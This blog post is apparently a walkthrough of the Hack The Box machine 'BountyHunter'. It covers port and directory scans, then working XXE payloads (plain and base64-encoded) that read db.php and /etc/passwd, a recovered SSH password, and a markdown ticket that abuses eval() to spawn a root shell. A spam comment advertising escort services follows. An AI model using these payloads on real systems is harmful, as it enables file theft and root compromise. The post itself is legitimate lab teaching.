Nmap
as usual,, I am always starting with the Nmap scan
# Nmap 7.80 scan initiated Sun Jul 25 09:14:32 2021 as: nmap -sV -sC -vv -oN nmap 10.10.11.100
Nmap scan report for 10.10.11.100
Host is up, received echo-reply ttl 63 (0.28s latency).
Scanned at 2021-07-25 09:14:33 IST for 25s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 25 09:14:58 2021 -- 1 IP address (1 host up) scanned in 25.85 seconds
Only two ports are opened
22 is ssh
80 is http
ENUMERATION
first,, we check port 80 whats inside
I am using ffuf for directory brute forcing you also can use gobuster,wfuzz whatever you want... :)
No cms its simple bootstrap site
so
I am using ffuf for directory brute forcing you also can use gobuster,wfuzz whatever you want... :)
FFUF
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.100/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/common.txt
:: Extensions : .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 410ms]
[Status: 200, Size: 25169, Words: 10028, Lines: 389, Duration: 409ms]
.htpasswd.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 3520ms]
.htaccess [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4702ms]
.htaccess.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4703ms]
.hta.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4702ms]
.htpasswd [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4703ms]
.hta [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4702ms]
assets [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 237ms]
css [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 408ms]
db.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 515ms]
index.php [Status: 200, Size: 25169, Words: 10028, Lines: 389, Duration: 611ms]
index.php [Status: 200, Size: 25169, Words: 10028, Lines: 389, Duration: 412ms]
js [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 613ms]
portal.php [Status: 200, Size: 125, Words: 11, Lines: 6, Duration: 251ms]
resources [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 613ms]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 291ms]
sakthi@debian:~/hacking/htb/bounty-hunter$
lots of files are there
portal.php is under development ok... and I follow that link
Bounty report system beta yep its under development
I tried SQL injections nothing work so I see the request found something interesting
whats is the data header .. its a base64 encoded text
so I decided to decode that text finally
its looks like this
<?xml version="1.0" encoding="ISO-8859-1"?>
<bugreport>
<title></title>
<cwe></cwe>
<cvss></cvss>
<reward></reward>
</bugreport>
XML?
ok I decided to do some xxe injections
what is xxe injection?
XML injection manipulates or compromises the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter the intended logic of an application
It also referred to xxe entity injection
for more
referred this blog
and also watch DevOps IPSec video, IPSec clearly explained on DevOps machine
I tried some payload form payload-all-the-things
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>∾</result></foo>
it's an example payload from payload-all-the-things
I edit that payload to, our machine
finally its look like this
SPOILER ALERT
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php">]>
<bugreport>
<title>&xxe;</title>
<cwe>no</cwe>
why we read db.php?
because we access every file in thats machine(index.php,portal.php) but db.php is empty(not empty it's a pure PHP file so the browser didn't show it)
PHP was backend developed language :)
we need burp to perform this attack
look at data
that value is base64+url encoded so we can also do this to our payload
finally, the payload looks like this
SPOILER ALERT
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbIDwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9ZGIucGhwIj4gXT4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT4meHhlOzwvdGl0bGU%2BCgkJPGN3ZT4meHhlOzwvY3dlPgoJCTxjdnNzPiZ4eGU7PC9jdnNzPgoJCTxyZXdhcmQ%2BJnh4ZTs8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4%3D
we have creds the user name admin is incorrect what is the username?
we grab the /etc/passwd file to find user names
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<bugreport>
<title>&xxe;</title>
<cwe>no</cwe>
<cvss>no</cvss>
<reward>no</reward>
</bugreport>
the final payload looks like this (base64+urlencoded)
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbIDwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCI%2BIF0%2BCgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU%2BJnh4ZTs8L3RpdGxlPgoJCTxjd2U%2Bbm88L2N3ZT4KCQk8Y3Zzcz5ubzwvY3Zzcz4KCQk8cmV3YXJkPm5vPC9yZXdhcmQ%2BCgkJPC9idWdyZXBvcnQ%2B
Two users have shell
one is a root user
another user name is development
so I tried to login development user with that creds
ssh development@10.10.11.100
password m19RoAU0hP41A1sTsq6K
we successfully logged
How to patch that vulnerabilty?
simple just libxml_disable_entity_loader(false); to
libxml_disable_entity_loader(true);
because that machine accepts externally entity(XML) load without sanitize inuput
file
PRIVILEGED ESCALATION
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.
def load_file(loc):
if loc.endswith(".md"):
return open(loc, 'r')
else:
print("Wrong file type.")
exit()
def evaluate(ticketFile):
#Evaluates a ticket to check for ireggularities.
code_line = None
for i,x in enumerate(ticketFile.readlines()):
if i == 0:
if not x.startswith("# Skytrain Inc"):
return False
continue
if i == 1:
if not x.startswith("## Ticket to "):
return False
print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
continue
if x.startswith("__Ticket Code:__"):
code_line = i+1
continue
if code_line and i == code_line:
if not x.startswith("**"):
return False
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
validationNumber = eval(x.replace("**", ""))
if validationNumber > 100:
return True
else:
return False
return False
def main():
fileName = input("Please enter the path to the ticket file.\n")
ticket = load_file(fileName)
#DEBUG print(ticket)
result = evaluate(ticket)
if (result):
print("Valid ticket.")
else:
print("Invalid ticket.")
ticket.close
main() this code asks for a file .md so make a file with .md extension and
that python code checks,,,
if the condition is true that code opens the file search for the next condition, so we include the second condition as os.cmd(bash) to pop up a root shell
so that file.md look like
# Skytrain Inc
## Ticket to root
__Ticket Code:__
**102+ 10 == 112 and __import__('os').system('/bin/bash') == False
We rooted :)
Wow! Thank you very much :D
ReplyDeleteThanks ❤️
DeleteThanks man...The post is very understandable.
ReplyDeleteThankyou ❤️
ReplyDeleteThe casino is open, has a poker room and a pool
ReplyDeleteIt offers 평택 출장샵 table games, blackjack, roulette and craps. 경산 출장안마 The hotel has 안산 출장안마 the latest poker room, a 100-seat poker room, 사천 출장안마 a 제주도 출장마사지 lounge with a sofa.
Post a Comment